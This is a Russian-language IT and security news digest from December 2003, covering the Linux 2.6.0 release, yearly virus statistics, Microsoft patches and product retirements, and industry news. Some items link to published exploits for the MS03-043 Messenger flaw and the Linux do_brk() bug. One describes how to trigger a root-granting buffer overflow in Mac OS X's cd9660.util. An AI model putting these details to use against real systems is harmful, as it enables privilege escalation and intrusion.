Cогласно сайту linux.org.ru, недавно стартовал проект по созданию музея истории Linux на CD, который назван "История Linux". К настоящему моменту проект выпустил два сборника: "История Linux. Том I "Как молоды мы были" (ранние версии современных дистрибутивов: Debian Linux 0.90 BETA, jurix (SuSE 4.2 pre-release), Red Hat Commercial Linux - Mother's Day Release + 0.1 (1.1), Slackware Linux 1.1.2) и "История Linux. Том II "Родина их не забудет" (BOGUS Linux 1.0, MCC Interim Linux 1.0+, Softlanding Linux System 1.05, Xdenu 2.0). Выпущенные в рамках проекта дистрибутивы подготовлены к запуску в эмуляторе Boch s, что позволяет работать с ними без переразбиения HDD, установки и прочих подготовительных операций (они просто выглядят как обычные приложения Linux или Windows. По своему функциональному назначению Bochs сходен с VMWare, Connectix VirtualPC и другими подобными продуктами). "Виртуальные" системы полностью функциональны: в них настроен X-сервер, имеется поддержка сети (предусмотрена даже работа в Интернете). Сайт проекта - http://www.linuxcenter.ru/history/
20/12/2003 17:03 Пора патчить патчи.
Как сообщает dl на bugtraq.ru, пока Microsoft не торопится исправлять уязвимость IE, позволяющую подделывать адреса, появился независимый патч, выпущенный Openwares.org. Однако этот патч, во-первых, добавляет новую более серьезную уязвимость, связанную с переполнением буфера, а во-вторых, похоже, передает какую-то информацию на Openwares. Обещан патч патча. Подробномти - http://www.theregister.co.uk/content/4/34610.html
20/12/2003 16:53 Отчёт о вирусной активности 2003 г. от "Лаборатории Касперского".
В конце года принято подводить итоги уходящего года. Не остались в стороне от традиций и российские антивирусные компании, в частности - "Лаборатория Касперского" опубликовала собственный отчёт о вирусах, зафиксированных в 2003 г. По этим данным, в 2003 году сеть Интернет перенесла 9 крупных вирусных эпидемий, нанеся мировой экономике ущерб в 12 миллиардов долларов, сообщает в пятницу сайт газеты "Газета". Как рассказал директор аналитического центра 'Лаборатории' Максим Поташов, в уходящем году произошли две крупнейшие эпидемии за всю историю интернета. 25 января сетевой червь Slammer (Helkern) за несколько минут заразил сотни тысяч компьютеров по всему миру, что привело к выходу из строя отдельных национальных сегментов сети. 12 августа появился второй крупнейший червь Lovesan (Blaster), использовавший для своего размножения, как и Slammer, недостатки в системе безопасности программного обеспечения компании Microsoft. В конце лета версия F червя из семейства Sobig побила все рекорды и стала самым распространым почтовым червем в сетевом трафике за всю историю Интернета. В разгар эпидемии Sobig.F находился в каждом двадцатом письме. Что касается "хит-парада" вирусов (троянов) года, то он выглядит так: 1. I-Worm.Sobig - 18,25 процента от всех зарегистрированных случаев заражения; 2. I-Worm.Klez - 16,84 процента; 3. I-Worm.Swen - 11,01 процента. Подробности - http://www.kaspersky.ru/news.html?id=144659030
19/12/2003 15:29 Cтатья по оптимизации Windows XP.
На одной из личных страничек портала narod.ru под названием Xoma software опубликована довольно полезная статья, представляющая собой набор советов по оптимальной настройке ОС Windows XP. Вполне возможно, что пользователи этого монстроподобного мутанта найдут для себя там много полезного. Статья - http://comprad.narod.ru/XP/main.html
19/12/2003 14:27 Пример того, как следует "бороться" с аудиопиратством.
Zef на bugtraq.ru сообщил довольно интересную новость. Российские музыканты решили бороться с аудио- и видеопиратами собственными силами. Сегодня группа известных российских исполнителей и продюсеров, среди которых Борис Гребенщиков, Андрей Макаревич, Андрей Тропилло, Артемий Троицкий, обнародует свое письмо-обращение в правительственную комиссию по противодействию нарушениям в сфере интеллектуальной собственности под председательством Михаила Касьянова. Музыканты придумали, как получать авторское вознаграждение даже с пиратов. Идея заключается в следующем: исполнители предлагают получать авторские отчисления (роялти) с розничных торговцев, независимо от того, продают они легальную или пиратскую продукцию. В момент продажи роялти будут пробиваться отдельной строкой в чеке, а магазины раз в месяц будут направлять отчет по наименованиям и количеству проданных произведений и суммам в адрес специально созданного фонда. Этот фонд, в свою очередь, будет распределять полученные средства между авторами, исполнителями и производителями фонограмм. Розничные торговцы считают, что чисто технически здесь нет никаких сложностей, перенастроить кассовый аппарат - не проблема. Самое главное - как это новшество отразится на цене товара. Опыт показывает, что снижение или увеличение цены примерно на доллар никак не влияет на объемы продаж. Проблемы могут возникнуть, если цена вырастет более серьезно. По мнению же авторов, конечная цена на легальные диски не увеличится. Двадцать процентов авторского гонорара и сейчас присутствуют в их стоимости, просто с введением новой схемы они станут видны покупателю. А вот контрафактная продукция станет на 20 процентов дороже. Авторы письма считают, что предлагаемая ими схема отчислений должна быть временной мерой - примерно лет на пять, "то есть на переходный период, необходимый для окончательного формирования цивилизованного отечественного рынка аудиовизуальной продукции", и надеются, что, так как оно имеет статус "открытого", недели за две к ним присоединятся сотни музыкантов. Подробности - http://www.rambler.ru/db/news/msg.html?mid=4087809
19/12/2003 14:05 Финансовое горе от юного ума.
Британский студент-первокурсник взломал компьютерные сети американской правительственной лаборатории. Сделал он это без особого злого умысла. Однако безобидные намерения будут стоить ему 21000 фунтов стерлингов. 18-летний Джозеф МакЭлрой из восточного Лондона хотел всего лишь использовать свои навыки для того, чтобы скачивать кино и музыку из Интернета. Тем не менее, его вторжение вызвало полномасштабную тревогу в чикагской лаборатории, которая занимается исследованиями частиц большой энергии. Окружной суд Bow Street Magistrates Court объявил, что правительство США требует компенсации для покрытия финансовых затрат из-за того, что властям пришлось «нажать кнопку паники». Юный г-н МакЭлрой признал, что разработал хитрую компьютерную программу для взлома 17 машин лаборатории Fermi National Accelerator Laboratory, а также неавторизованно модифицировал ПК. Подробности - http://www.runet.ru/news/4254.html
19/12/2003 13:43 Вирус Sober вернулся, подробности - письмом.
Почтовый вирус Sober, наделавший немало шуму в октябре, вернулся сегодня утром. Его новая инкарнация – W32.Sober.B@mm – практически идентична предыдущей версии и поэтому получила статус «малоопасного». Тем не менее, предупреждает TechWorld, расслабляться не стоит: далеко не всем пользователям Сети хватило истекших двух месяцев, чтобы произвести иммунизацию своего компьютера, а значит – риск возникновения эпидемии очень высок. Вирус (точнее – червь), разработанный в Германии, работает только под управлением операционных систем семейства Windows и, соответственно, полагается в своем распространении не столько на хитрый программный код, сколько на обычную человеческую глупость. Если Sober.A пытался выдать себя за письмо от антивирусной лаборатории (и преуспел в этом), то W32.Sober.B@mm пугает пользователя милитаристскими замыслами Дж. Буша-мл. (George W. Bush plans new war) или же новыми происками хакеров (Have you being hacked?). К письму прилагается файл с разнообразными названиями и расширениями, типа .com, .cmd, .exe или .pif. Если пользователь окажется достаточно любопытным, чтобы нажать на иконку, произойдет заражение: инсталляция червя и внесение изменений в системный реестр. Источник - http://www.internet.ru
19/12/2003 13:28 Выход Антивируса Касперского® 5.0 для файловых Linux/Unix-серверов.
"Лаборатория Касперского" объявила о выходе новой версии Антивируса Касперского® для Linux/Unix File Servers. Программа, которая придет на смену предыдущей версии 4.0, включает в себя ряд существенных изменений и доработок, повышающих производительность и упрощающих настройку и управление. Антивирус Касперского 5.0 для Linux/Unix File Servers предназначен для антивирусной проверки файловых серверов, работающих под управлением операционных систем Linux/Unix. Он позволяет эффективно осуществлять поиск и нейтрализацию вредоносных кодов во всех объектах файловых систем, расположенных на сервере. При этом продукт располагает удобной системой автоматической загрузки обновлений антивирусной базы, а также гибким механизмом настройки. Основным отличием Антивируса Касперского 5.0 для Linux/Unix File Servers является реализация новой антивирусной технологии, являющейся последней разработкой экспертов "Лаборатории Касперского". Внедренное во все компоненты продукта антивирусное ядро включает в себя все передовые антивирусные технологии мирового класса и обеспечивает значительное по сравнению с предшествующей версией снижение нагрузки на производительность компьютера при полном сохранении функциональности продукта. Более подробно - http://www.kaspersky.ru/news.html?id=144654112
19/12/2003 13:15 Real подала антимонопольный иск против Microsoft
В четверг поставщик технологии потоковых медиа RealNetworks вступил в долгую судебную тяжбу с Microsoft, обвинив софтверного гиганта в незаконном использовании монополии Windows с целью подрыва бизнеса конкурентов в сфере цифровых медиа. В заявлении в федеральный суд Сан-Хосе (штат Калифорния) RealNetworks утверждает, что Microsoft «много лет проводила курс широкомасштабной грабительской политики… приведшей к значительным потерям доходов и бизнеса для RealNetworks». К этому истец добавляет, что Microsoft пользовалась своим «монопольным положением для ограничения возможностей производителей ПК устанавливать конкурирующие медиаплееры и навязывания каждому пользователю Windows медиаплеера Microsoft, хочет он этого или нет». На телеконференции с журналистами главный юрисконсульт RealNetworks Боб Кимболл сказал, что причиненный компании ущерб может превышать 1 млрд долл. Истец также требует вынесения приговора, предотвращающего «дальнейшую противозаконную деятельность» Microsoft. Подробности - http://www.zdnet.ru/?ID=311378
19/12/2003 12:52 100 тысяч атак на сайт президента.
ФСБ России зафиксировало около ста тысяч компьютерных атак на интернет-сайт президента РФ. Эти данные сообщил в пятницу директор ФСБ Николай Патрушев. "В истекшем году только на сайт президента Российской Федерации было осуществлено около 100 тысяч компьютерных атак. Всего же в 2003 году зарегистрированы свыше 730 тысяч атак на интернет-представительства органов государственной власти", - цитирует слова главы ФСБ РФ РИА "Новости". По словам Николая Патрушева, все компьютерные атаки успешно нейтрализованы средствами защиты сайтов, который были разработаны специалистами Центра безопасности связи ФСБ РФ. Патрушев пояснил, что на этот центр возложено обеспечение защиты информации, обрабатываемой и передаваемой с помощью криптографических и технических средств. Патрушев сказал, что суды вынесли 10 обвинительных приговоров в отношении лиц, привлеченных к уголовной ответственности за компьютерные преступления. Не претендуя на непогрешимость, позволим себе усомниться в цифре названной главой ФСБ. Судя по количеству зажержанных, то ли каждый из них произвел по 73 тысячи атак на органы власти, то ли ФСБ плохо работает, то ли СОРМа-2 силовикам уже мало и они готовят почву для введения новых механизмов для контроля за пользователями Интернета. Источник - http://www.rian.ru
18/12/2003 17:08 Как FreeBSD хранит данные.
Благодаря Rend-у с сайта SYSADMINS.RU обнаружена довольно интересная ссылка, на которой выложена статья Станислава Лапшинского под названием "Разделяйте ваши данные". Статья посвящена технологии хранения данных на жёстком диске в операционной системе FreeBSD, А также принципам разбивки диска при помощи программы fdisk. Cтатья - http://old.softerra.ru/freeos/19959/page1.html
18/12/2003 16:40 Microsoft выпустила внеплановый патч.
Несмотря на официальный отказ компании Microsoft от выпуска обновления для своих продуктов в декабре нынешнего года, один патч каким-то образом проник в службу Windows Update. Это, впрочем была не новая заплатка, а выпущенный еще в ноябре патч для расширений HTML-редактора FrontPage 2002. Из-за сбоя в системе автоматических обновлений этот патч не попал на некоторые компьютеры с ОС Windows XP. Чтобы восполнить этот пробел, заплатка была выпущена повторно, сообщает CNET News. Подробности о дыре, исправляемой патчем для расширений FrontPage 2002, можно прочитать здесь. Эта дыра позволяет хакеру выполнять на атакуемом компьютере произвольный код и характеризуется Microsoft как критическая, что подразумевает необходимость скорейшей установки патча. Несмотря на то, что повторный выпуск заплатки состоялся с целью устранения ошибки в работе службы автоматического обновления, он является нарушением расписания выпуска пачтей, принятого Microsoft. Это идет вразрез со взятым Microsoft курсом на упрощение процесса обновления своих продуктов, поэтому в отношении случившегося уже ведется специальное должностное расследование. Источник - http://www.news.com.com
18/12/2003 14:54 Управление серверами станет стандартизованным.
Крупнейшие участники индустрии серверов объединились, чтобы принять стандарт управления сетевыми машинами. Это может облегчить бремя, лежащее на администраторах, и привести к созданию новых технологий. Над стандартом работают Dell, IBM, Hewlett-Packard и Sun Microsystems — четверка ведущих производителей серверов, а также Microsoft, Oracle, Intel, Advanced Micro Devices и разработчик серверного ПО OSA Technologies. Возглавляют организацию, получившую название Server Management Working Group, компании Dell, IBM, HP и Intel. По словам старшего менеджера Dell по планированию управления серверами Чада Ингелгау, стандарт должен определить унифицированный способ решения программным обеспечением дистанционного администрирования таких задач, как перезагрузка системы, изменение конфигурации подсистемы хранения данных, назначение машинам интернет-адресов и обновление системного ПО. В разных системах такие задачи решаются по-разному, что затрудняет создание управляющего ПО и его поддержание на современном уровне, а также использование программного обеспечения одной компании для управления серверами другой. Обсуждение нового стандарта начнется в среду, а его первая версия должна появиться к 1 июля. Подробнее - http://www.zdnet.ru/?ID=311176
18/12/2003 14:33 Кучма отменил бесплатные входящие.
Президент Украины подписал Закон «О телекоммуникациях», принятый парламентом 18 ноября 2003 года. Один из ключевых его момента - отмена жесткого требования к операторам исключить плату за входящие звонки на мобильные телефоны. Текст закона размещен на официальном сайте Верховной Рады Украины - www.rada.gov.ua. Он предусматривает создание нового регуляторного органа государственной власти — Национальной комиссии по регулированию связи. НКРС унаследует от Госкомсвязи функции лицензирование и регистрации в сфере предоставления телекоммуникационных услуг, надзора за рынком, разработки предельных тарифов, сбора статистической информации о рынке и выработки на ее основании стратегических рекомендаций, касающихся осуществления государственной политики в отрасли. Новый нормативный акт отменяет поправку к старому закону «О связи», запрещавшую операторам брать плату за входные звонки. Теперь потребитель имеет право не оплачивать услуги, которые он не заказывал. В случае, если оплата входящих прямо предусмотрена договором, пользователь мобильной связи обязан ее своевременно производить. Подробности - http://zakon.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=1280%2D15&p=1
18/12/2003 13:49 Коммунисты обвиняют ЦИК в хакинге.
Как сообщает internet.ru, член ЦИК от КПРФ Вадим Соловьев утверждает, что в ночь подсчета голосов по указанию руководства Центризбиркома в ГАС «Выборы» были отключены фильтры, защищавшие систему от ввода заведомо неверных данных. Коммунисты обвинили Центризбирком РФ в фальсификации 60 тысяч протоколов для голосования, сообщает "Газета.ру". Об этом заявил вчера представителям СМИ лидер КПРФ Геннадий Зюганов. Вадим Соловьев сообщил, что из полученных копий протоколов 60 тысяч «не совпадают с официальными протоколами ЦИК, которые вводились в систему ГАС «Выборы» и размещены в сети Интернет». «Наша система, как и ГАС «Выборы», имеет специальные фильтры, которые не позволяют ввести протокол, если данные о проголосовавших превышают число выданных бюллетеней,» – подчеркнул он. - «Мы говорили с главным конструктором системы ГАС «Выборы», и он предположил, что, по всей видимости, в официальной системе фильтры были сняты, поэтому удалось ввести неправильные протоколы, а мы, в свою очередь, будем организовывать ручной пересчет протоколов». Источник - http://www.gazeta.ru/
18/12/2003 12:33 Выход ядра Linux 2.6.0!
Итак, товарищи, вершилось! 17 декабря 2003 г. в 20:14:06 -0800 (PST) Линус Торвальдс объявил на сайте lkml.org о выходе нового ядра новой ветви Linux под названием 2.6.0! После 11 тестовых версий вышла стабильная (?) версия новой ветки! Как пишет сам Линус, доступен также патч для апгрейда с версии 2.6.0-test11 до 2.6.0, замечая при этом, что он не пустой (что значило бы отсутствие багов в предыдущей нестовой версии) и занимает 11 КБ. Один из коллег Линуса - Эндрю, написал документ, описывающий основные изменения ядра 2.6.0 от ядер 2.4.х (2.4.23, надо полагать, ибо оно на текущий момент - крайнее). Таким образом, пользователи Linux (при желании) могут скачивать новое ядро и испытывать. Хотя лично я бы не рекомендовал его пробовать на критичных серверах (памятуя о сырости ядра версии 2.4.0). ChangeLog - http://lkml.org/lkml/2003/12/17/181 Качать - http://kernel.org/mirrors/
18/12/2003 11:01 Microsoft отправит на пенсию Windows 2000 Server.
Компания Microsoft постепенно готовится к прекращению поставок серверных операционных систем семейства Windows 2000. Весной нынешнего года компания выпустила новую ОС Windows Server 2003, которая в перспективе окончательно заменит Windows 2000. При этом постепенное свертывание поставок Windows 2000 Server и Advanced Server начнется уже в будущем году. Продажи Windows 2000 начались в феврале 2000 года. По сообщению InfoWorld, свертывание поставок Windows 2000 Server будет осуществляться постепенно, в течение двух лет. 1 апреля 2004 года Microsoft прекратит поставки Windows 2000 Server и Advanced Server по розничным каналам, а также по программам лицензирования для крупных заказчиков (volume licensing). Следующий этап свертывания поставок начнется 1 ноября, когда Windows 2000 Server, Windows 2000 Advanced Server and Windows 2000 Datacenter перестанут поставляться крупным поставщикам оборудования по OEM-каналам. Годом позже - 1 ноября 2005 года операционные системы серии Windows 2000 Server перестанут поставлять и системные интеграторы, и продажи предыдущего поколения серверных ОС Microsoft полностью прекратятся. Это не означает, однако, что Windows 2000 Server вообще нельзя будет приобрести. Операционную систему этого семейства можно будет получить от Microsoft, купив лицензию на Windows Server 2003 и использовав право перехода на более раннюю версию (downgrade). Что касается поддержки, то основная поддержка Windows 2000 Server прекратится 31 марта 2005 года, а расширенная поддержка будет предлагаться вплоть до 31 марта 2007 года. Источник - http://www.compulenta.ru
17/12/2003 19:04 Новые маршрутизаторы Cisco.
Представители Cisco Systems объявили о расширении семейств магистральных и граничных маршрутизаторов и выпуске систем, конкурирующих с продуктами Juniper Networks. В состав новых устройств входит магистральный Internet-маршрутизатор 12800 с 40-гигабитными слотами и высокой плотностью портов линейных карт OC-192/STM-64 и OC-48/STM-16. Среди последних - двухпортовые модули OC-192c и восьмипортовые - OC-48c. Пропускная способность в режиме коммутации достигает 1,2 Тбит/с, что в четыре раза превышает производительность предыдущей модели. Серия граничных маршрутизаторов пополнилась моделями 12010 и 12006 с 2,5-гигабитными слотами, устанавливаемыми в шести- и десятислотовых шасси. Приобретение программных ключей позволяет повысить производительность до 10 Гбит/с. Новые устройства могут работать со всеми линейными картами, предназначенными для маршрутизаторов серии 12000. Поставки всех маршрутизаторов начнутся в январе 2004 года. Источник - http://www.osp.ru
17/12/2003 18:38 Российско-белорусский кластер оценили в мире.
Вчера на пресс-конференции в Москве были подведены итоги четырех лет реализации совместной российско-белорусской программы «СКИФ», в рамках которой был построен кластер «СКИФ К-500» - третья отечественная компьютерная система, вошедшая в список TOP500 самых производительных суперкомпьютеров мира. Применяемые в семействе «СКИФ» 2D-адаптеры SCI уже серийно выпускаются на российском предприятии ОАО «НИЦЭВТ», г. Москва. В кластере «СКИФ К-500» использованы 3D SCI-адаптеры от компании Dolphin, которые в ближайшем будущем также будут освоены в ОАО «НИЦЭВТ», что позволит разработчикам не зависеть от западных производителей. Основой кластера стали 128 процессоров Intel Xeon с тактовой частотой 2,8 ГГц, которые объединены в 64 двухпроцессорных вычислительных узла, обладающих емкостью дисковой подсистемы в размере 60 ГБ каждый (общая емкость дисковой системы, таким образом, составляет 3840 ГБ). Кластер располагает 128 ГБ оперативной памяти, а его пиковая производительность составляет 716,8 гигафлоп (миллиардов операций с плавающей запятой). Соотношение производительность/цена в кластере составляет менее $1 млн. на 1 терафлоп, заявляют разработчики. Кластер сдан в эксплуатацию в сентябре 2003 года и установлен в Минске, в здании Объединенного института проблем информатики национальной академии наук (ОИПИ НАН) Республики Беларусь. Подробности - http://www.cnews.ru/newtop/index.shtml?2003/12/16/153053
17/12/2003 18:22 Novell углубляется в Linux.
Производитель сетевого ПО продолжает двигаться в направлении операционной системы с открытым исходным кодом. Во вторник компания выпустила свой первый пакет сетевых сервисов для Linux. Пакет Novell Nterprise Linux Services 1.0 обеспечивает Linux-системы службами файлов, печати, каталога, управления и обработки сообщений в комплекте с соответствующими услугами поддержки, обучения и консалтинга. Он работает как на принадлежащей Novell версии операционной системы SuSE Linux Enterprise Server, так и на дистрибутивах Red Hat, и нацелен на компании, желающие заменить серверное ПО Microsoft Windows на Linux. В состав Nterprise Linux Services 1.0 входят инструменты сетевого управления, самообслуживания и коллективной работы, службы каталога, управления файлами и печатью, а также календарь и веб-средства обмена сообщениями. Кроме того, пакет содержит версию ПО управления сетевыми ресурсами на базе инструментария администрирования серверов Ximian Red Carpet. В последние месяцы Novell с головой погрузилась в растущий рынок Linux. В августе компания приобрела разработчика настольного ПО для Linux Ximian, а в ноябре — второго по величине дистрибьютора операционной системы SuSE. Подробности - http://www.zdnet.ru/?ID=311190
17/12/2003 17:13 Декабрьский номер Crypto-Gram.
Bruce Schneier, основатель и технический директор компании Counterpane Internet Security, Inc. объявил о выходе очередного номера ежемесячного электронного журнала Crypto-Gram, который посвящён освещению проблем различных аспектов сетевой безопасности. Опбликованы следующие статьи т традиционные разделы: Blaster and the August 14th Blackout, Counterpane News, Crypto-Phone, The Doghouse: Amit Yoran, Crypto-Gram Reprints, Quantum Cryptography, News, Beyond Fear News, Computerized and Electronic Voting, Comments from Readers. Crypto-Gram - http://www.schneier.com/crypto-gram-0312.html
17/12/2003 16:42 Эксплоит уязвимости MS03-043.
Некто MrNice (из Франции?) опубликовал эксплоит уязвимости ОС Windows, описанной в бюллетене MS03-043 (уязвимость в сервисе Messenger). Написан на Си для платформы win32. Как пишет сам автор работоспособность его проверялась на французкой версии Win2K без всяких сервис-паков. Необходимо заметить, что в случае работоспособности в версии Windows без патчей практическое применение этого эксплоита не представляет ценности, на что автору резонно указал в BUGTRAQ Michael H.Warfield, отметивший, что подобный сервер вряд ли "проживёт" в Интернете долго, поскольку сразу же может быть подвергнут атакам со стороны известных червей Welchia/Nachi/MS-Blaster. Эксплоит - http://www.securityfocus.com/archive/1/347752/2003-12-14/2003-12-20/0
17/12/2003 16:28 Microsoft окончательно отказывается от Windows старше 2000.
Как известно, с 16 января 2004 года корпорация Microsoft прекращает выпуск своих "старых" продуктов, таких, как Windows 98, Windows NT 4 и Outlook 2000, сообщает BBC News. Руководство компании приняло такое решение из-за того, что некоторые продукты содержат код, который некорректно работает с языком Java, что является нарушением соглашения, которое Microsoft заключила в 2001 году с компанией Sun Microsystems. Решение о прекращении реализации продуктов, как отмечает BBC News, может причинить серьезные неудобства огромному количеству пользователей - согласно социологическим опросам, большинство организаций, в работе которых задействованы более 10 компьютеров, используют "старые" программы Microsoft. Исследование провела компания AssetMetrix. Согласно данным, полученным в ходе него, 80 процентов фирм используют Windows 98 или 95. Последний продукт Microsoft, Windows XP, стоит всего на семи процентах машин. Самой популярной операционной системой является Windows 2000. Это решение означает также, что корпорация прекратит создание патчей для латания "дыр" в старых системах. Для их поддержки и сервиса теперь надо будет обращаться к другим фирмам. Microsoft также объявила о создании специального подразделения, которое займется разработкой и продажей новых систем семейства Windows. Новая группа называется Центральное подразделение операционной системы Windows (Windows Core Operating System Division), сообщает Reuters. Она, в частности, будет заниматься разработкой и внедрением новой операционной системы Longhorn, которую недавно представил Билл Гейтс. Подробности - http://lenta.ru/internet/2003/12/17/microsoft/
17/12/2003 16:14 Рейтинг наиболее активных вирусов 2003 года.
Подводя итоги уходящего года, компания Panda Software опубликовала рейтинг самых, на её взгляд, активных вирусов 2003 года. Набрав более 11 %, червь Bugbear.B стал самым вредоносным кодом, заразившим наибольшее количество компьютеров в этом году. Его успех можно объяснить способностью к массовой рассылке и использованием для автоматического запуска бреши в Internet Explorer. Второе место занимает Klez.I. Этот червь, впервые обнаруженный в апреле 2002 года, продолжает заражать огромное количество компьютеров и фигурирует более чем в 8,5 % случаев заражения. Его активности способствовали различные факторы, включая возможность червя запускаться автоматически, использование им методов так называемого социального инжиниринга для обмана пользователей и способность оставаться незамеченным (многие пользователи даже не подозревают о том, что их компьютеры заражены этим червем). Троянец PSW.Bugbear.B (немного меньше шести 6,5 %) расположился на третьем месте. Это не удивительно, учитывая тот факт, что данный вредоносный код тесно связан с червем Bugbear.B, который и загружает его на компьютеры. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=223
17/12/2003 15:51 Джордж Буш подписал федеральный закон против спама.
Во вторник президент США Буш подписал закон о спаме, в котором устанавливаются сроки тюремного заключения и многомиллионные штрафы за злоупотребления при рассылке писем в сети интернет, передает агентство Reuters. В законе также предусмотрено создание регистра электронных адресов, обладатели которых заранее отказываются от рекламных предложений. Однако, по мнению экспертов, закон не поможет в ближайшее время избавиться от писем, рекламирующих невероятно низкие проценты по ипотеке, схемы мгновенного обогащения, средства для улучшения половой жизни и другие интересные предложения, доля которых в общем объеме электронной корреспонденции превышает 50 процентов. Дело в том, что, согласно новому закону, предприятие имеет право посылать рекламные письма, если оно не скрывает свои координаты и уважает просьбы клиентов прекратить рассылки. Подробности - http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=4001997
16/12/2003 20:23 SMS-Мошенники.
Появились сообщения о новом виде мошенничества с использованием сотовых телефонов. Абоненту Би Лайн приходит SMS с незнакомого телефонного номера с текстом: «Привет, как дела?» В случае, если абонент заинтересуется и отправит ответ (неважно, какого содержания), приходит следующая SMS: «Меня зовут Ольга. Я скучаю дома, надеюсь, я тебя не отвлекла». Далее, на все последующие сообщения абонента, приходит одна и та же SMS: «Мы с тобой не знакомы, я просто отправила тебе sms и ты мне ответил. Классно!!!» Как Вы уже догадались, никакой Ольги на самом деле нет, заранее заготовленные SMS генерируются программой-роботом. А вот отправленные ответные сообщения, по информации Абонентской службы Би Лайн, обходятся абоненту в $ 0.56 за каждое SMS. Такой SMS-спам распространялся с номера +7 926 580 69 60 сотовой сети МегаФон. Однако, возможно, в будущем мошенники станут пользоваться и другими номерами. Будьте осторожны, не отвечайте на SMS-сообщения с незнакомого телефонного номера! Это стало возможно из-за возможности созданий платных голосований в сети билайн. Но только вместо использования их по назначению, особо хитрые делают деньги. Источник - http://www.nnm.ru
16/12/2003 20:01 Ещё один эксплоит do_brk() Linux.
Опубликован очередной эксплоит уязвимости в функции do_brk() ядра Linux, о которой сообщалось на прошлой неделе. Автор - поляк Paul (IhaQueR) Starzetz. Написан на Си. Эксплоит - http://packetstorm.linuxsecurity.com/0312-exploits/hatorihanzo.c
16/12/2003 19:48 Слияние Check Point Software с Zone Labs.
Как сообщается на сайте CheckPoint, 15 декабря в Рэдвуде и Сан-Франциско (Калифорния) был заключён договор о слиянии двух известнейших в компьютерном мире компаний - Check Point Software Technologies и Zone Labs®, Inc. Напомним, что первая компания известна своим файрволлом CheckPoint Firewall, вторая - популярным персональным файрволлом - Zone Alarm (Plus и Pro). Чтио получится от такого слияния - пока не совсем понятно. То ли более защищённые персональные файрволлы, то ли менее защищённые серверные :). Скорее всего (IMHO), бесплатный клон ZoneAlarm перестанет жить. Хотя.... время покажет. Подробности - http://www.checkpoint.com/press/2003/zonelabs121503.html
16/12/2003 18:07 Антивирус Касперского® 4.5 для Microsoft Exchange Server.
"Лаборатория Касперского", представила Антивирус Касперского® 4.5 для Microsoft Exchange Server. Продукт обеспечивает антивирусную проверку всех электронных сообщений, проходящих через почтовые системы, построенные на базе Microsoft Exchange Server 5.5/2000/2003. Программа является одним из ключевых элементов семейства продуктов под индексом 4.5 и включает в себя ряд существенных изменений. Антивирус Касперского 4.5 для Microsoft Exchange Server представляет собой пакет программ, обеспечивающий всестороннюю защиту почтового сервера путем проверки всех входящих и исходящих сообщений, а также хранимых в них объектов, на присутствие вирусов. В случае необходимости программный комплекс быстро и надежно нейтрализует вредоносный код, полностью исключая его дальнейшее распространение. Программа снабжена широким спектром функций по обработке зараженных объектов, в том числе возможностью переименовывать зараженные и подозрительные письма и перемещать их в карантинный каталог. Для максимально высокой производительности Антивирус Касперского для Microsoft Exchange Server позволяет проверять почту в нескольких потоках. Максимальная эффективность антивирусной защиты достигается за счет полностью автоматизированного механизма удаленного обновления антивирусных баз данных. В отличие от предшественницы, версия 4.5 обеспечивает защиту корпоративного почтового сервера на основе простой и эффективной системы управления, реализованной благодаря глубокой интеграции с Microsoft Management Console, стандартной утилитой Microsoft Windows. Новизну продукта также подчеркивает полная совместимость с последней технологической разработкой компании Microsoft - Microsoft Exchange Server 2003 (Titanium). Источник - http://www.kaspersky.ru
16/12/2003 17:50 Статья "Безопасность домашних пользователей: Персональные файрволы".
На сайте SecurityLab опубликован очередной перевод статьи с сайта SecurityFocus под названием "Безопасность домашних пользователей: Персональные файрволы". Переводчик - Vladimir Kouksenok, автор оригинальной статьи - Sarah Granger. Статья рассматривает различные файрволлы, предназначенные для защиты конкретного PC От сетевых атак, троянов и прочих пакостей (для чего, собственно, персональные файрволлы и предназначены). Также приводятся сравнительные характеристики персональных файрволлов. Статья - http://www.securitylab.ru/41723.html
16/12/2003 17:38 Sun раздает Solaris на пробу бесплатно.
Sun Microsystems предлагает в целях ознакомления бесплатные копии своей операционной системы Solaris x86, добиваясь того, чтобы новое ПО попало в руки как можно большего числа пользователей. Раньше Sun брала за ознакомительные копии Solaris x86, версии ОС для серверов с процессорами от Intel или AMD, по 20 долл. Начиная с 9 декабря компания разрешает загружать их бесплатно. «Этот шаг поможет получить Solaris многим заказчикам Sun, которым было трудно перевести доллары в США, например из Азии или Европы, — говорится в заявлении компании. — Объявление об альянсе Sun с AMD привело к повышению спроса на Solaris x86 во всем мире, и мы сможем быстро удовлетворить его, облегчив процесс загрузки для потенциальных заказчиков и для тех, кто оценивает ОС Solaris x86 как на 32-, так и на 64-разрядных платформах». После ознакомления заказчики, пожелавшие установить Solaris или Solaris x86 для коммерческих целей, смогут приобрести понравившуюся им ОС. Для серверов с собственными процессорами UltraSparc Sun уже давно предлагает бесплатные ознакомительные копии Solaris. Подробности - http://zdnet.com.com/2100-1103_2-5124433.html
16/12/2003 17:26 Переполнение буфера в MacOSX.
Некто Max из Тулы (? - адрес tula.net) сообщает о возможности переполнения буфера в утилите cd9660.util, входящей в состав утилит для работы c файловой системой ISO-9660 (файловая система CD-ROM). Расположена она в директории /System/Library/Filesystems/cd9660.fs/. Передав в качестве опции -p сформированную на Перл последовательность из 512 символов можно вызвать переполнение буфера. Так как сама утилита имеет бит SUID и полномочия root:wheel, можно повысить привилегии в системе. Источник - http://www.securityfocus.com
16/12/2003 17:03 Опубликовано расписание выхода Fedora Core 2.
На сайте компании RedHat опубликованы планы компании по выпуску новой версии бесплатного дистрибутива от RedHat, получившего название Fedora Core. Название RedHat решено оставить для комерческого дистрибутива RedHat Enterprise Server. Как написано, выпуск новой (второй по счёту версии) Fedora Core намечен на 3 апреля 2004 г. В дистрибутив планируется включить: ядро 2.6, SELinux, GNOME 2.6, KDE 3.2. Подробнее - http://fedora.redhat.com/participate/schedule/
16/12/2003 16:31 "Кластерные бомбы" - новая напасть электронной почты.
